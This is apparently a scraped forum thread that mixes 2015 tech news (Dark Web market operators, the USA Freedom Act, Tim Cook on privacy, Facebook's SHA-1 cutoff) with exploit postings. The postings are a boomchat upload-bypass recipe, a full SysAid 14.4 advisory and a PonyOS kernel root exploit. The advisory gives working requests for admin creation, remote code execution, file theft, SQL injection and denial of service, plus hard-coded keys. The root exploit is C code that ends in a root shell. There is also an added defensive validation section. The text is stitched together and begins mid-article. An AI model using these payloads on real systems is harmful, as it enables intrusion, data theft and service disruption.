He’ll also be serving the time of all the Dark Web drug lords who escaped his fate. Here are five of those online narco-kingpins who—for now—remain at large. Variety Jones Despite Ulbricht’s arrest and the rounding up of four of his Silk Road lieutenants, the second most important figure in that black market operation still hasn’t been captured or even publicly identified. Variety Jones served as Ulbricht’s security consultant, advisor, and even mentor, according to Ulbricht’s journal and chat logs the prosecutors admitted into evidence at trial. The anonymous figure, who sold cannabis seeds on the site, also secretly advised Ulbricht on everything from tracking sales statistics to creating a personal cover story. It was Jones who named him the Dread Pirate Roberts to give the impression of a rotating command rather than a single individual. And Jones also nudged the Dread Pirate Roberts toward violence, suggesting in a private chat that they murder an employee believed to have stolen hundreds of thousands of dollars in bitcoin from the site. Atlantis During the Silk Road’s time online, its most aggressive competition came from a site called Atlantis, a Dark Web market with a similar business model, but with the addition of an advertising budget. Atlantis went so far as to post a public YouTube video ad and to host an “ask-me-anything” session on Reddit with the site’s unnamed founder and its CEO. In an encrypted interview, those leaders would later describe their site to me as the “Facebook to [silk Road’s] Myspace.” Just before the FBI bust of the Silk Road in the summer of 2013, however, Atlantis’ founders shuttered their site and absconded with all their users’ bitcoins. Ross Ulbricht would write in his journal that the Atlantis admins had privately warned him of a purported security flaw in Tor that inspired them to abandon ship. The Atlantis creators never resurfaced—neither online nor in the hands of law enforcement. 
Dread Pirate Roberts 2

Just one month after the original Silk Road was seized, Silk Road 2 came online. At its helm, of course, was a new Dread Pirate Roberts; Ulbricht’s cover story of a rotating command had become a self-fulfilling prophecy. The second DPR was at least as talkative as the first, posting political statements to the Silk Road 2 forums and even creating a Twitter account. But after three Silk Road 2 administrators were arrested—all of whom had worked for the original Dread Pirate Roberts on Silk Road 1.0—the new Dread Pirate Roberts gave up control of the site to a new administrator named Defcon. Defcon would be identified as 26-year-old Blake Benthal and arrested as part of Operation Onymous, a mass purge of Dark Web sites by the FBI and Europol late last year that took down dozens of Tor hidden services. But the second Dread Pirate Roberts seemed to escape that international dragnet.

Verto

For a year starting in March of 2014, Evolution was the new and improved mecca of the Dark Web’s underground economy. At its peak, Evolution had more than twice as many product listings as the Silk Road ever offered, including types of contraband Ulbricht never allowed on the Silk Road such as stolen financial information. And it somehow ran faster and stayed online far more reliably than its competitors. That criminal professionalism was in part the work of an experienced cybercriminal called Verto, Evolution’s pseudonymous founder and the founder of the earlier Dark Web black market known as Tor Carder Forum, devoted to identity theft. Then in March of this year, Verto and Evolution co-founder Kimble abruptly shut down the site, taking with them millions of dollars of their users’ bitcoins. A Department of Homeland Security investigation continues to search for the two Evolution administrators, revealed a subpoena sent to the “darknetmarkets” forum of Reddit seeking to identify Evolution staffers. But no arrests have been announced.
Darkside

For any Dark Web drug lord trying to avoid being the next Ross Ulbricht, step one is not to be in the United States. That’s a lesson from Darkside, the creator of RAMP, the Russian Anonymous Marketplace. RAMP has survived three years online—longer than any other Dark Web drug market—by focusing exclusively on Russian clientele. “We never mess with the CIA, we work only for Russians and this keeps us safe,” Darkside told WIRED in December of last year. “You can’t rape the whole world and remain safe.” Darkside, who uses an illustration of Edward Norton as his online avatar, said at the time of that interview that RAMP was continuing to earn him close to $250,000 a year in revenue, far less than the Silk Road but enough for Darkside to consider himself a “rich guy” in his local currency. And he offered another tip to avoid the kind of law enforcement crackdown that targeted the Dread Pirate Roberts: don’t talk politics. In fact, all political discussion is banned on RAMP. “Politics always attract extra attention,” Darkside wrote. “We do not want that.”

Source
16. | # Title : boomchat-v4.2 Upload Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : no 4 noob
| # Tested on: Win8 fr pro
| # Bug : Upload
| # Download : www.20script.ir
=======================================
1- register in script 4 chat
2- change photo of profile
3- change evil from 1.php to 1.php.jpg
4- go to
Source
17. Hi,

tl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE. SysAid have informed me they all have been fixed in 15.2, but no re-test was performed.

Full advisory below, and a copy can be obtained at [1].

5 Metasploit modules have been released and are currently awaiting merge in the moderation queue [2].

Regards,
Pedro

[1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5470
https://github.com/rapid7/metasploit-framework/pull/5471
https://github.com/rapid7/metasploit-framework/pull/5472
https://github.com/rapid7/metasploit-framework/pull/5473
https://github.com/rapid7/metasploit-framework/pull/5474

>> Multiple vulnerabilities in SysAid Help Desk 14.4
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 03/06/2015 / Last updated: 03/06/2015

>> Background on the affected product:
"SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance."

Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon.
All vulnerabilities affect both the Windows and Linux versions unless otherwise noted.
>> Technical details:

1)
Vulnerability: Administrator account creation
CVE-2015-2993 (same CVE as #10)
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4

GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123

This creates an account with the following credentials: mr_lit:secret
Note that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted.

2)
Vulnerability: File upload via directory traversal (authenticated; leading to remote code execution)
CVE-2015-2994
Constraints: valid administrator account needed (see #1 to create a valid admin account)
Affected versions: unknown, at least 14.4

POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------81351919525780

-----------------------------81351919525780
Content-Disposition: form-data; name="activation"; filename="whatevs.jsp"
Content-Type: application/octet-stream

<html><body><%out.println(System.getProperty("os.name"));%></body><html>
-----------------------------81351919525780--

The response returns a page which contains the following:

var imageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501";
var thumbUrl = "icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501";
if(imageUrl != null && $.trim(imageUrl).length > 0) {
document.getElementById("cropbox").src = imageUrl;
document.getElementById("preview").src = thumbUrl;
parent.glSelectedImageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp";

Go to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP.

3)
Vulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution)
CVE-2015-2995
Constraints: no authentication or any other information needed.
The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details.
Affected versions: unknown, at least 14.3 and 14.4

POST /sysaid/rdslogs?rdsName=../../../../sample.war%00
<... WAR payload here ...>

4)
Vulnerability: Arbitrary file download
CVE-2015-2996 (same CVE as #8)
Constraints: none; no authentication or any other information needed (see #5 to obtain the traversal path)
Affected versions: unknown, at least 14.4

GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd

5)
Vulnerability: Path disclosure
CVE-2015-2997
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4; only works on the Linux version

POST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>

Metasploit PoC:

large_traversal = '../' * rand(15...30)
servlet_path = 'getAgentLogFile'
res = send_request_cgi({
  'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
  'method' => 'POST',
  'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),
  'ctype' => 'application/octet-stream',
  'vars_get' => {
    'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)),
    'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))
  }
})

The response (res.body.to_s) will be similar to:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD><TITLE>Error</TITLE></HEAD>
<BODY>
<H1>Internal Error No#14</H1>
<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)</H2>
</BODY></HTML>

The tomcat path is revealed between the H2 tags.

6)
Vulnerability: Use of hard-coded cryptographic key
CVE-2015-2998
Constraints: N/A
Affected versions: unknown, at least 14.4

SysAid Help Desk uses a hard-coded encryption key and encryption parameters.
If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file.
Algorithm: DES password based encryption with MD5 hash
Key: "inigomontoya"
Salt: [-87, -101, -56, 50, 86, 53, -29, 3]
Iterations: 19

7)
Vulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp
CVE-2015-2999
Constraints: valid administrator account needed
Affected versions: unknown, at least 14.4

a)
POST /sysaid/genericreport HTTP/1.1

action=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin
Parameters: groupFilter

action=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no
Parameters: customSQL

action=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin
Parameters: customSQL

(3 different payloads are shown because the reportName parameter seems to change which parameters have the injection)

b)
POST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE

resizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=
Parameter: dir

c)
POST /sysaid/RFCGantt.jsp HTTP/1.1

listName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true
Accepts injection between $$ in ganttSQL parameter.
8)
Vulnerability: Denial of service
CVE-2015-2996 (same CVE as #4)
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4

GET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero

This request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).

9)
Vulnerability: XML Entity Expansion (leading to denial of service)
CVE-2015-3000
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4

a)
POST /sysaid/agententry?deflate=0

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

b)
POST /sysaid/rdsmonitoringresponse
<lol bomb in POST data>

c)
POST /sysaid/androidactions
<lol bomb in POST data>

These requests will cause the cpu to go to 100% and the memory to balloon for 10+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever).
10)
Vulnerability: Uncontrolled file overwrite
CVE-2015-2993 (same CVE as #1)
Constraints: no authentication or any other information needed
Affected versions: unknown, at least 14.4

GET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm

This will overwrite the file with "SysAid". This string is fixed and cannot be controlled by the attacker.

11)
Vulnerability: Use of hard-coded password for the SQL Server Express administrator account
CVE-2015-3001
Constraints: N/A
Affected versions: unknown, at least 14.4

When installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to "Password1".

>> Fix:
Upgrade to version 15.2 or higher.

Source
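The boomchat trick in post 16 (rename 1.php to 1.php.jpg so a multi-extension handler still runs it as PHP) and SysAid #2 and #3 above (a .jsp accepted by the photo upload; a ../ path ending in %00) all come down to the server trusting the client's file name. The following is an added Python example, not code from boomchat or SysAid, of how an upload handler can refuse such names: it keeps exactly one extension from an allow-list, rejects NUL bytes and path components, checks that the content signature matches the claimed type, and never lets the client choose the stored name. It goes a little beyond the two advisories by also checking magic bytes. The allow-list, the upload directory and the magic-byte table are assumptions for the example.

```python
"""Upload-name hardening: added example, not code from boomchat or SysAid."""
import os
import re
import secrets

# Assumed allow-list for a profile-photo upload; adjust per application.
ALLOWED_IMAGE_EXTENSIONS = frozenset({"jpg", "jpeg", "png", "gif"})
# Leading bytes of the formats we accept, so content must agree with extension.
MAGIC_BYTES = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}
_SAFE_BASENAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class RejectedUpload(ValueError):
    """Raised for any client-supplied name or content we will not store."""


def validate_upload_name(client_filename: str, allowed=ALLOWED_IMAGE_EXTENSIONS) -> str:
    """Return the single allow-listed extension of a client-supplied file name.

    Rejects NUL bytes (the %00 truncation trick), directory components
    (../../x), hidden names, and any name with more than one dot, which is
    what lets 1.php.jpg reach a handler that still executes it as PHP.
    """
    if "\x00" in client_filename:
        raise RejectedUpload("NUL byte in file name")
    # Keep only the last path component; clients may send ../ or C:\ prefixes.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not name or name.startswith(".") or name != name.strip():
        raise RejectedUpload("empty, hidden, or whitespace-padded name")
    parts = name.split(".")
    if len(parts) != 2:
        raise RejectedUpload(f"expected exactly one extension, got {len(parts) - 1}")
    base, ext = parts[0], parts[1].lower()
    if not _SAFE_BASENAME.match(base):
        raise RejectedUpload("base name contains characters outside [A-Za-z0-9_-]")
    if ext not in allowed:
        raise RejectedUpload(f"extension {ext!r} is not allow-listed")
    return ext


def content_matches_extension(data: bytes, ext: str) -> bool:
    """True when the upload starts with the signature of the claimed format."""
    return data.startswith(MAGIC_BYTES[ext.lower()])


def stored_path(upload_dir: str, client_filename: str, data: bytes,
                allowed=ALLOWED_IMAGE_EXTENSIONS) -> str:
    """Choose where an upload is written. The client never picks the name."""
    ext = validate_upload_name(client_filename, allowed)
    if not content_matches_extension(data, ext):
        raise RejectedUpload(f"content does not look like a .{ext} file")
    target = os.path.join(upload_dir, f"{secrets.token_hex(16)}.{ext}")
    # Belt and braces: the resolved target must still be inside upload_dir.
    root = os.path.realpath(upload_dir)
    if os.path.commonpath([root, os.path.realpath(target)]) != root:
        raise RejectedUpload("resolved path escapes the upload directory")
    return target


if __name__ == "__main__":
    # Constructed inputs mirroring the two advisories.
    jpeg_header = b"\xff\xd8\xff\xe0" + b"\x00" * 12
    print(stored_path("/var/www/uploads", "avatar.jpg", jpeg_header))
    for bad in ("1.php.jpg", "whatevs.jsp", "../../../../sample.war\x00.jpg"):
        try:
            validate_upload_name(bad)
        except RejectedUpload as exc:
            print(f"rejected {bad!r}: {exc}")
```

The name check alone would still let a JSP body through under a .jpg name, which is why stored_path also looks at the first bytes; and because the stored name is random and single-extension, neither Apache's multi-extension handling nor a later traversal bug gets a usable name to work with.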
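The bombs in #9 work because the XML parser expands the nested entities before the application ever sees the document. The following is an added Python example, not SysAid code, showing the guard an endpoint like agententry needs: parse with the stdlib expat parser and refuse the document at the DOCTYPE, before a single entity is expanded, keep an entity-declaration hook as a second line of defence, and cap the element count so a document built from plain nesting cannot do the same job. The sample documents are constructed; the element cap is an assumption to tune per endpoint.

```python
"""Entity-expansion guard for untrusted XML: added example, not SysAid code."""
import xml.parsers.expat

MAX_ELEMENTS = 10_000  # assumed cap; tune to what the endpoint legitimately receives


class UnsafeXML(ValueError):
    """Raised when a client document is refused before it can do harm."""


def parse_untrusted_xml(data: bytes, max_elements: int = MAX_ELEMENTS) -> dict:
    """Parse XML from an unauthenticated client and return {"root", "elements"}.

    The DOCTYPE handler fires before any entity is declared, so a laughs
    payload is rejected without one expansion. The entity handler is kept
    in case DTD refusal is ever relaxed, and the element cap bounds
    documents that try to exhaust memory with nesting instead of entities.
    """
    parser = xml.parsers.expat.ParserCreate()
    seen = {"root": None, "elements": 0}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} refused: DTDs are not accepted from clients")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration {name!r} refused")

    def on_start(tag, attrs):
        if seen["root"] is None:
            seen["root"] = tag
        seen["elements"] += 1
        if seen["elements"] > max_elements:
            raise UnsafeXML(f"more than {max_elements} elements")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from None
    return seen


# Constructed samples: a benign agent document and a three-level laughs bomb
# (the advisory's payload goes nine levels deep, about 10**9 expansions).
SAMPLE_AGENT = b"<agent><id>7</id><hostname>ws01</hostname></agent>"
SAMPLE_BOMB = (
    b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
    b'<!ENTITY lol1 "' + b"&lol;" * 10 + b'">'
    b'<!ENTITY lol2 "' + b"&lol1;" * 10 + b'">'
    b'<!ENTITY lol3 "' + b"&lol2;" * 10 + b'">]><lolz>&lol3;</lolz>'
)

if __name__ == "__main__":
    print(parse_untrusted_xml(SAMPLE_AGENT))
    try:
        parse_untrusted_xml(SAMPLE_BOMB)
    except UnsafeXML as exc:
        print("refused:", exc)
```

Refusing the DTD outright is the same policy defusedxml applies with forbid_dtd; it costs nothing for machine-generated agent traffic, which never needs one, and it means the cost of a bomb is the bytes on the wire rather than the expansion.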
  18. The NSA’s phone-snooping program is on its last legs after senators voted Tuesday to approve the USA Freedom Act, banning bulk collection of Americans’ data two years after the practice was revealed to the public by Edward Snowden. President Obama signed the bill late Tuesday, moving quickly to kick-start several Patriot Act powers that expired this weekend after senators missed a deadline for renewing them. But the bill, which cleared the Senate on a 67-32 vote, puts limits on a key power. Investigators still can demand businesses to turn over customers’ documents and records, but the data must be targeted to individuals or groups and cannot be done indiscriminately. The National Security Agency must end its snooping program within six months, forcing intelligence officials to set up a system that will leave the information with phone companies. Investigators will be able to submit a query only if they have a specific terrorism lead. “It’s the first major overhaul of government surveillance in decades and adds significant privacy protections for the American people,” said Sen. Patrick J. Leahy, a Vermont Democrat who led a two-year fight to end the NSA’s snooping. “Congress is ending the bulk collection of Americans’ phone records once and for all.” Supporters of the NSA program predicted that intelligence officials will not be able to get the same kinds of results if phone companies rather than government agencies hold the data. Senate Majority Leader Mitch McConnell, Kentucky Republican, said Mr. Obama will be blamed for weakening U.S. security and that the NSA program’s end was in line with the president’s opposition to detaining suspected terrorists at Guantanamo Bay, Cuba, and failing to confront the Islamic State. “The president’s efforts to dismantle our counterterrorism tools have not only been inflexible, they are especially ill-timed,” Mr. McConnell said. 
But it was the majority leader’s miscalculations about scheduling that backed NSA supporters into a corner. Mr. McConnell wanted the entire program to be extended and tried to use the June 1 expiration deadline to force fellow senators into a take-it-or-leave-it choice. But his colleagues, including a large percentage of Republicans, rejected his bid, sending the Senate over the deadline and undercutting Mr. McConnell’s leverage. On Tuesday, Mr. McConnell made a last-ditch effort to change the bill, doubling the six-month grace period for the NSA and requiring the government to certify that it could keep producing the same results even without storing the phone data itself. Even some senators who were sympathetic to his cause, though, voted against the amendments, saying any changes would have sent the bill back to the House and prolonged the fight, leaving the Patriot Act neutered in the meantime. Nearly half of Senate Republicans voted for the USA Freedom Act, joining all but one Democrat and a Democrat-leaning independent. The vote was a major vindication for the House, which for the second time this year has driven the legislative agenda on a major issue, striking a bipartisan compromise that senators were forced to accept. The bill also had the backing of the intelligence community, which has assured Congress that it won’t be giving up any major capabilities and can make the new system work even with the data held by phone companies instead of the NSA. Mr. Obama initially defended the program, but after several internal reviews found it to be ineffective and potentially illegal, he said he would support a congressional rewriting to end the law. The George W. Bush and Obama administrations justified the program under Section 215 of the Patriot Act, which gives federal investigators power to compel businesses to turn over customers’ documents and records. 
Using that power, the NSA demanded the metadata — the numbers, dates and durations involved — from all Americans’ calls. The information was stored and queried when investigators suspected a number was associated with terrorism and wanted to see who was calling whom. Backers said the program didn’t impinge on Americans’ liberty because the information, while stored by the government, wasn’t searched until there was a specific terrorism nexus. They said there were never any documented abuses of the program. But opponents said repeated reviews, including one last month by the Justice Department’s inspector general, found the program has never been responsible for a major break in a terrorism case. Given its ineffectiveness, they said, it was time to end it. Sen. Ron Wyden, an Oregon Democrat who had been battling behind closed doors for years as a member of the intelligence committee to end the program, said the vote was a first step. He said he and like-minded colleagues now will turn to other powers under the Foreign Intelligence Surveillance Act that the government uses to scoop up emails — a power Mr. Wyden said is increasingly gathering information on Americans, contrary to its intent. “This is only the beginning. There is a lot more to do,” he said. Some of Mr. Wyden’s colleagues in those fights, including Sen. Rand Paul, Kentucky Republican, voted against the USA Freedom Act. “Forcing us to choose between our rights and our safety is a false choice,” said Mr. Paul, who is running for the Republican presidential nomination and making his stand against the Patriot Act a major part of his campaign. Mr. Paul even used the obstruction powers the Senate gives to a single lawmaker to block action Sunday, sending Congress hurtling across the deadline and causing three powers to expire: the records collection, the ability to target “lone wolf” terrorists and the power to track suspected terrorists from phone to phone without obtaining a wiretap each time. 
The lone-wolf and wiretap powers were extended without changes. Source
  19. Apple chief Tim Cook has made a thinly veiled attack on Facebook and Google for "gobbling up" users' personal data. In a speech, he said people should not have to "make trade-offs between privacy and security". While not naming Facebook and Google explicitly, he attacked companies that "built their businesses by lulling their customers into complacency". Rights activists Privacy International told the BBC it had some scepticism about Mr Cook's comments. "It is encouraging to see Apple making the claim that they collect less information on us than their competitors," Privacy International's technologist Dr Richard Tynan said. "However, we have yet to see verifiable evidence of the implementation of these claims with regard to their hardware, firmware, software or online services. "It is crucial that our devices do not betray us." 'We think that's wrong' Addressing an audience in Washington DC, Mr Cook said: "I'm speaking to you from Silicon Valley, where some of the most prominent and successful companies have built their businesses by lulling their customers into complacency about their personal information. "They're gobbling up everything they can learn about you and trying to monetise it. We think that's wrong. And it's not the kind of company that Apple wants to be." Mr Cook had been given a corporate leadership award by the Electronic Privacy Information Centre, a US-based research group. According to TechCrunch, he later added that Apple "doesn't want your data". Google has not commented on Mr Cook's comments specifically, but a spokeswoman referred the BBC to the privacy section of its website, which the company has recently updated. "Ads are what enable us to make our services like Search, Gmail, and Maps free for everyone," one page reads. "We do not share information with advertisers in a way that personally identifies you, unless you gave us permission." Facebook suggested this page outlining how it collects user data. 
While Apple does not hold the same wealth of data looked after by Google and Facebook, it does use personal information to target advertising. A page for marketers on Apple's website offers "400 targeting options" for reaching users. It reads: "Whether you're looking for moms or business travellers or groups of your own customers, we've got you covered." Apple's lack of data, when compared with some of its rivals, could be a disadvantage for future devices. Services such as Google Now, which use stored data to predict what information users may need, require vast amounts of personal data to be effective. Advertising Mr Cook also spoke at length about encryption. His company introduced encryption measures by default to its devices late last year, a move heralded by privacy campaigners but heavily criticised by several governments. Mr Cook hit out at governments that had pressured technology companies to allow for so-called "backdoors" to aid with counter-terrorism and other enforcement. "There's another attack on our civil liberties that we see heating up every day," Mr Cook said. "It's the battle over encryption. Some in Washington are hoping to undermine the ability of ordinary citizens to encrypt their data." He added: "If you put a key under the mat for the cops, a burglar can find it too." Source
20. Facebook has set the date: on September 30, the ancient and creaking SHA-1 hashing algorithm will make its tumbril trip and get the chop. SHA-1, designed by the NSA in 1995, is a one-way algorithm: a block of data is turned into a message digest. The digest can't be turned back into the original message, but serves as a digital signature confirming the authenticity of (for example) the software you've downloaded. And it's long been on the end-of-life list, because it's vulnerable to collision attacks – different blocks of data can present the same SHA-1 hash, allowing malware to verify as if it were authentic. From October 1, The Social Network™ says, third-party apps signed with SHA-1 will no longer be able to connect to Facebook. As Facebook's Adam Gross blogs, the move is in line with the Certificate Authority and Browser Forum's intention to sunset SHA-1 by January 2016. “We'll be updating our servers to stop accepting SHA-1 based connections before this final date, on October 1, 2015. After that date, we'll require apps and sites that connect to Facebook to support the more secure SHA-2 connections”, Gross wrote. Facebook recommends that “applications, SDKs, or devices that connect to Facebook” be checked for SHA-2 support, to avoid user irritation. The migration hasn't been without its detractors. Earlier this year, infosec bods told The Register the shift poses challenges. If users see disruption – for example, too many “insecure site” warnings – they fear that trust in the Internet will be undermined. Source
21. # Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit
# Google Dork: [if applicable]
# Date: 29th June 2015
# Exploit Author: HackerFantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: [app version] PonyOS <= 3.0
# Tested on: PonyOS 3.0
# CVE : N/A
# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c

/* PonyOS <= 3.0 tty ioctl() root exploit
   ========================================
   PonyOS 0.4.99-mlp had two kernel vulnerabilities disclosed in April 2013 that could be leveraged to read/write arbitrary kernel memory. This is due to tty winsize ioctl() allowing to read/write arbitrary memory. This exploit patches the setuid system call to remove a root uid check allowing any process to obtain root privileges. John Cartwright found these flaws and others here: https://www.exploit-db.com/exploits/24933/

   Written for educational purposes only. Enjoy!

   -- prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memcpy(); missing from the original listing */
#include <sys/ioctl.h>

int main(){
    struct winsize ws;
    printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");
    /* Stage 8 bytes of patch code in the tty's window-size struct ... */
    memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8);
    ioctl(0, TIOCSWINSZ, &ws);
    /* ... then have the unchecked TIOCGWINSZ copy them to a kernel address
       inside sys_setuid(), overwriting its uid check. */
    ioctl(0, TIOCGWINSZ, (void *)0x0010f101);
    printf("[-] patched sys_setuid()\n");
    /* Call the patched system call (eax=0x18, ebx=0) through PonyOS's int 0x7F gate. */
    __asm("movl $0x18,%eax");
    __asm("xorl %ebx,%ebx");
    __asm("int $0x7F");
    printf("[-] Got root?\n");
    system("/bin/sh");
}

Source

@Byte-ul I don't have the time to put together a demo, nor the "necessary resources"; I'm going to close the thread to avoid going off-topic.
22. @Kronzy we got started on testing and in the end we managed to make the alert fire. ) + it rhymes.
23. We have been added to the HOF. https://technet.microsoft.com/en-us/security/cc308589.aspx